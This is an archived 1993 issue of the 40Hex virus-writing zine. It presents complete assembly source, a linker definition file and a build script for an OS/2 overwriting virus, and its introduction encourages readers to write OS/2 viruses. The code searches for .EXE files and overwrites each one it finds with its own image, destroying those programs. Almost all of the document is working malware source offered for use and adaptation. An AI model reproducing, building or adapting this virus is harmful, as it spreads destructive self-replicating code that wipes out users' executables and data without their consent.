home *** CD-ROM | disk | FTP | other *** search

---

/ Hacks & Cracks / Hacks_and_Cracks.iso / hackersguides-&-software / 40hex-12.zip / 40HEX-12.009

< prev

Wrap

Text File  |  1993-11-26  |  12KB  |  266 lines

---

1. 40Hex Number 12 Volume 3 Issue 3                                      File 009
2.  
3.     This virus was given to us by Arthur Ellis, and is the first piece
4. of OS/2 virus source that I have ever seen.  Although it is only an
5. overwriting virus, it should definately be helpful for anyone who wants
6. to write viruses in OS/2.
7.  
8.                                                 ->GHeap
9.  
10. -----------------------------<Os2Vir1.Asm>-------------------------------------
11. INCLUDE OS2.INC     ; if you don't have OS2.INC, see end of this file
12. COMMENT *
13. This simple overwriting virus demonstrates how the OS/2 API functions
14. are used to search for, open, and infect programs. No extended registers
15. are used, and the program may be assembled with MASM 5.1 or 6.0, TASM
16. for OS/2 (from the Borland C++ package), or with IBM Macro Assembler/2.
17. Link with :link386 /exepack virus,,,c:\os2\doscalls,virus.def
18. VIRUS.DEF:         NAME VIRUS WINDOWCOMPAT
19.                    PROTMODE
20.                    STACKSIZE 8192
21. There is minimal error checking (since when do viruses check errors?). A
22. useful project for a student would be to convert this program to .386p mode.
23. - Arthur Ellis, 1993
24. *
25. PrintIt     MACRO   string, StrLen
26.             push    1                       ; stdout handle
27.             push    DS
28.             mov     DX, OFFSET string       ; string to write
29.             push    DX
30.             xor     CX,CX                   ; zero CX
31.             mov     CL, [StrLen]            ; string length
32.             push    CX
33.             push    DS
34.             push    OFFSET Written          ; bytes written variable
35.             call    DosWrite                ; like int 21/40
36.             ENDM
37. OpenIt      MACRO   seg, handle, mode       ; SEGMENT, open mode, handle
38.             push    seg                     ; SEGMENT of file name
39.             push    BX                      ; OFFSET of file name
40.             push    DS                      ; SEGMENT of handle
41.             push    OFFSET handle           ; OFFSET of handle
42.             push    DS                      ; SEGMENT of open action
43.             push    OFFSET OpenAction       ; OFFSET of open action
44.             push    0                       ; file size DWORD
45.             push    0                       ; file size DWORD
46.             push    3                       ; attributes: hid,r-o,norm
47.             push    1                       ; FILE_OPEN
48.             push    mode                    ; OPEN_SHARE_DENYNONE
49.             push    0                       ; DWORD 0 (reserved)
50.             push    0                       ; DWORD 0 (reserved)
51.             Call    DosOpen                 ; like int 21/3D
52.             ENDM
53. .286p
54.  
55. STACK       SEGMENT PARA STACK 'STACK'
56.             DW    1000h
57. STACK       ENDS
58.  
59. DGROUP      GROUP   _DATA, STACK
60.  
61.             ASSUME  CS:_TEXT, DS:DGROUP, SS:DGROUP, ES:DGROUP
62.  
63. _DATA       SEGMENT WORD PUBLIC 'DATA'
64.  
65. FileSpec    DB      '*.EXE', 0
66. OpenErr     DB      ' <Error opening file>',13,10,27,'[m'
67. Hello       DB      27,'[2J',27,'[1;36mMy name is '
68. Infected    DB      ' --> infected'
69. CRLF        DB      13,10,27,'[m'
70. Written     DW      ?                       ; bytes written
71. MyHandle    DW      ?                       ; virus handle
72. VicHandle   DW      ?                       ; victim handle
73. OpenAction  DW      ?                       ; open result
74. Buf         FileFindBuf <>                  ; file find structure
75. MySize      DW      ?                       ; virus length
76. EnvSeg      DW      ?                       ; selector for environment
77. CmdOfs      DW      ?                       ; OFFSET of command line
78. Image       DB      2000 dup (?)            ; virus image
79. ImageLen    DW      ?                       ; length of virus
80. DirHandle   DW      -1                      ; directory handle
81. SrchCount   DW      1                       ; search count
82. _DATA       ENDS
83.  
84. _TEXT       SEGMENT WORD PUBLIC 'CODE'
85.             extrn DOSCLOSE:far, DOSEXIT:far, DOSWRITE:far, DOSGETENV:far
86.             extrn DOSFINDCLOSE:far, DOSFINDFIRST:far, DOSFINDNEXT:far
87.             extrn DOSOPEN:far, DOSREAD:far
88.  
89. main        PROC    far
90. start:      call    GetName                 ; get the virus filename
91.             OpenIt  ES, MyHandle, 40h       ; open virus for read
92. ;--------------------------------------------------------------------
93. ;---( Read virus to image buffer )-----------------------------------
94. ;--------------------------------------------------------------------
95.             push    MyHandle                ; handle for this program
96.             push    DS                      ; buffer for file image
97.             push    OFFSET Image
98.             push    2000                    ; Could use DosQFileInfo to
99.                                             ;  get filesize but this works
100.             push    DS
101.             push    OFFSET ImageLen         ; virus length goes here
102.             call    DosRead                 ; like int 21/3F
103. ;--------------------------------------------------------------------
104. ;---( Find files to infect )-----------------------------------------
105. ;--------------------------------------------------------------------
106.             call    FindIt                  ; find first file
107.  
108. found:      or      AX, AX                  ; error?
109.             jz      NoErr                   ; no error
110.  
111. quit:       push    1                       ; terminate all threads
112.             push    0                       ; return code
113.             call    DosExit                 ; like int 21/4C
114.  
115. NoErr:      cmp     word ptr SrchCount, 0   ; no files found?
116.             jz      quit                    ; none found
117.  
118.             PrintIt Buf.findbuf_achname,Buf.findbuf_cchName
119.                                             ; display filename found
120. ;--------------------------------------------------------------------
121. ;---( Write virus )--------------------------------------------------
122. ;--------------------------------------------------------------------
123.             lea     BX,Buf.findbuf_achName  ; filename OFFSET in BX
124.  
125.             OpenIt  DS, VicHandle, 42       ; ACCESS_READWRITE|SHAREDENYNONE
126.             or      AX,AX                   ; error?
127.             jz      proceed
128.             PrintIt OpenErr, 25             ; error on open
129.             jmp     CloseIt
130.  
131. proceed:    PrintIt Infected,15             ; add to hit list
132.             mov     BX,[VicHandle]
133.             push    [VicHandle]             ; write to found file
134.             push    DS
135.             push    OFFSET Image            ; string to write
136.             push    [ImageLen]              ; image length
137.             push    DS
138.             push    OFFSET Written          ; bytes written variable
139.             call    DosWrite                ; write the virus
140.  
141. CloseIt:    push    [VicHandle]             ; prepare to close
142.             call    DosClose                ; close file
143. ;--------------------------------------------------------------------
144. ;---( Find next file )-----------------------------------------------
145. ;--------------------------------------------------------------------
146.             push    DirHandle               ; Directory Handle
147.             push    DS                      ; SEGMENT of buffer
148.             push    OFFSET Buf              ; OFFSET of buffer
149.             push    SIZE Buf                ; length of buffer
150.             push    DS                      ; SEGMENT of count
151.             push    OFFSET SrchCount        ; OFFSET of count
152.             call    DosFindNext             ; Find next file
153.                                             ; like int 21/4F
154.             jmp     found                   ; infect if found else exit
155.  
156. main        ENDP
157. ;--------------------------------------------------------------------
158. ;---( Get virus file name from environment )-------------------------
159. ;--------------------------------------------------------------------
160. GetName     PROC    near
161.             push    ds
162.             push    OFFSET EnvSeg
163.             push    ds
164.             push    OFFSET CmdOfs
165.             call    DosGetEnv               ; get seg, ofs of command line
166.  
167.             mov     ES,EnvSeg               ; ES:BX holds command line
168.             mov     BX,CmdOfs
169.  
170.             xor     DI,DI
171.             xor     AL,AL
172.             mov     CX,-1
173.             cld
174. scan:       repne   scasb                   ; scan for double null
175.             scasb
176.             jne     scan                    ; loop if single null
177.             mov     BX,DI                   ; program name address
178.             mov     CX,-1                   ; find length
179.             repne   scasb                   ; scan for null byte
180.             not     CX                      ; convert CX to length
181.             dec     CX
182.             mov     [MySize],CX             ; return length
183.  
184.             PrintIt Hello, 22
185.  
186.             push    1                       ; stdout handle
187.             push    ES                      ; segment for command line
188.             push    BX                      ; OFFSET of program name
189.             push    [MySize]                ; length of program name
190.             push    DS
191.             push    OFFSET Written          ; bytes written variable
192.             call    DosWrite                ; like int 21/40
193.  
194.             PrintIt CRLF,5
195.             ret
196. GetName     ENDP
197. ;--------------------------------------------------------------------
198. ;---( Find first victim )--------------------------------------------
199. ;--------------------------------------------------------------------
200. FindIt      PROC    near
201.             push    DS
202.             push    OFFSET FileSpec
203.             push    SS                      ; SEGMENT of directory handle
204.             lea     AX, DirHandle           ; OFFSET of directory handle
205.             push    AX
206.             push    07h                     ; attribute
207.             push    DS                      ; SEGMENT of buffer
208.             push    OFFSET Buf              ; OFFSET of buffer
209.             push    SIZE Buf                ; length of buffer
210.             push    DS                      ; SEGMENT of search count
211.             lea     AX, SrchCount           ; OFFSET of search count
212.             push    AX
213.             push    0                       ; Reserved
214.             push    0
215.             call    DosFindFirst            ; Find first file
216.             ret                             ; like int 21/4E
217. FindIt      ENDP
218. ;--------------------------------------------------------------------
219. _TEXT       ENDS
220.             END start
221. ;--------------------------------------------------------------------
222. ;--( FTIME structure from OS2.INC )----------------------------------
223. ;--------------------------------------------------------------------
224. ;FTIME   STRUC
225. ;    ftime_fs    DW  ?
226. ;FTIME   ENDS
227. ;ftime_twosecs   EQU 01fh
228. ;ftime_minutes   EQU 07e0h
229. ;ftime_hours EQU 0f800h
230. ;--------------------------------------------------------------------
231. ;--( FDATE structure from OS2.INC )----------------------------------
232. ;--------------------------------------------------------------------
233. ;FDATE   STRUC
234. ;    fdate_fs    DW  ?
235. ;FDATE   ENDS
236. ;fdate_day   EQU 01fh
237. ;fdate_month EQU 01e0h
238. ;fdate_year  EQU 0fe00h
239. ;--------------------------------------------------------------------
240. ;--( FileFindBuf structure from OS2.INC )----------------------------
241. ;--------------------------------------------------------------------
242. ;FILEFINDBUF STRUC
243. ;findbuf_fdateCreation   DB  SIZE FDATE DUP (?)
244. ;findbuf_ftimeCreation   DB  SIZE FTIME DUP (?)
245. ;findbuf_fdateLastAccess DB  SIZE FDATE DUP (?)
246. ;findbuf_ftimeLastAccess DB  SIZE FTIME DUP (?)
247. ;findbuf_fdateLastWrite  DB  SIZE FDATE DUP (?)
248. ;findbuf_ftimeLastWrite  DB  SIZE FTIME DUP (?)
249. ;findbuf_cbFile  DD  ?
250. ;findbuf_cbFileAlloc DD  ?
251. ;findbuf_attrFile    DW  ?
252. ;findbuf_cchName DB  ?
253. ;findbuf_achName DB  256 DUP (?)
254. ;FILEFINDBUF ENDS
255. ;---------------------------------------------------------------------
256.  
257. -----------------------------<Virus.Def>----------------------------------------
258. NAME VIRUS WINDOWCOMPAT
259. PROTMODE
260. STACKSIZE 8192
261.  
262. -----------------------------<DoIt.Cmd>-----------------------------------------
263. masm /Zi %1;
264. link386 /exepack %1,,,c:\os2\doscalls,virus.def
265.  
266.